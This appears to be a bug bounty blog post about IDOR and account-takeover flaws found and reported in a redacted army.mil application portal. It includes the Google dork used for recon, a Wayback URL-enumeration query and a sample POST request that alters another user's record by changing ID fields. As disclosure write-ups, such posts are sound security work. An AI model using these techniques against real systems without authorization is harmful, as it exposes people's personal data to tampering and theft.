The tale of IDOR's : Hacking US Dept. Of Defence

I get acknowledged & appreciated by US Department Of Defence for finding multiple Security vulnerabilities in the US amry systems i..e █████.army.mil. In this blog post, I’ll explain all the technical part and non-technical parts of it.

My Initial Approach?

1 - At first, I picked up any one asset from the GitHub scope list and started hacking on it.

2 - But after a couple of minutes, I realized this is not my thing, I feel like wasting my time in filtering assets & running automated tools for subdomain enumeration.

3 - Hence, I decided to look for Access Control, IDOR’s, Authentication Issues. So, for that, I need functional assets that have some functionalities that need to be broken.

4 - Hence, I used simple google dorks as Site: *.army.mil "register" | "sign up" | "login". I have some interesting assets, but most are restricted only to federal staff.

5 - One is available for normal users like it was based on internships or contract-based serving in the US Army. Like as a normal user, I could apply in that portal by registering myself & submitting my application.

1 - IDOR leads to view any user Biographical Details

ssrf

2 - IDOR leads to modify any user Biographical Details

Vulnerable Request
POST /JOINOnline/Board/SubmitDoc HTTP/1.1
Host: www.█████.army.mil
Cookie: {YOUR-COOKIES}
...snip...
Connection: close

------WebKitFormBoundaryrQSrSuOi1l18BB2E
Content-Disposition: form-data; name="UserId"
268
------WebKitFormBoundaryrQSrSuOi1l18BB2E
Content-Disposition: form-data; name="Id"
1328
------WebKitFormBoundaryrQSrSuOi1l18BB2E
...snip...
Male
------WebKitFormBoundaryrQSrSuOi1l18BB2E
Content-Disposition: form-data; name="__RequestVerificationToken"
{VERIFICATION-TOKEN}
------WebKitFormBoundaryrQSrSuOi1l18BB2E--

3 - IDOR leads to PII Leak

ssrf

4 - Restrict any user from Login to their account

5 - Email Takeover leads to Permanent Account Deletion

https://web.archive.org/cdx/search/cdx?url=█████.army.mil&fl=original&collapse=urlkey
https://www.█████.army.mil/852████3EBO25/CreateAccount.html

Conclusion

It took me about 2 hrs to find 7 vulnerabilities in one asset. I didn’t perform so much recon, automation ..etc. Just picked up one asset from Google Dorks & Started hacking on it. And the vulnerabilities are pretty much very simple & straightforward.

“Sometimes you don’t need to be very smart, just try simple things”.

Timeline